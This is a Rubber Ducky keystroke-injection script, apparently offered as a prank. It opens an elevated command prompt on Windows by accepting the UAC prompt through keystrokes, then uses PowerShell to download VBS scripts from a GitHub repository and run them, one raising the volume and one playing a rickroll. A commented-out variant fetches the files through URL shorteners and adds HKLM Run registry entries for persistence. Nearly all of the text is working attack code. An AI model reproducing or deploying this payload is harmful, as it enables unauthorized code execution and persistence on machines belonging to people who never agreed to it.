DELAY 2000

REM DELAY 600
REM ESCAPE

DELAY 300
CONTROL ESCAPE
DELAY 300
STRING cmd
DELAY 700
MENU
DELAY 300
DOWNARROW
DELAY 300
ENTER

DELAY 500
ALT y

DELAY 600
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/karimodm/rubber-pranks/master/volup.vbs','%userprofile%\volup.vbs'); && start %userprofile%\volup.vbs && powershell (new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/karimodm/rubber-pranks/master/rickroll.vbs','%userprofile%\rickroll.vbs'); && start %userprofile%\rickroll.vbs && exit

REM powershell (new-object System.Net.WebClient).DownloadFile('https://goo.gl/Q0ahyr','%userprofile%\rickroll.vbs'); && start %userprofile%\rickroll.vbs && reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v TotallyNotShadyStartupItem /d %userprofile%\rickroll.vbs && powershell (new-object System.Net.WebClient).DownloadFile('https://goo.gl/sT2cos','%userprofile%\volup.vbs'); && start %userprofile%\volup.vbs && reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v TotallyNotShadyStartupItem2 /d %userprofile%\volup.vbs && exit
DELAY 200
ENTER
DELAY 200
WINDOWS DOWNARROW

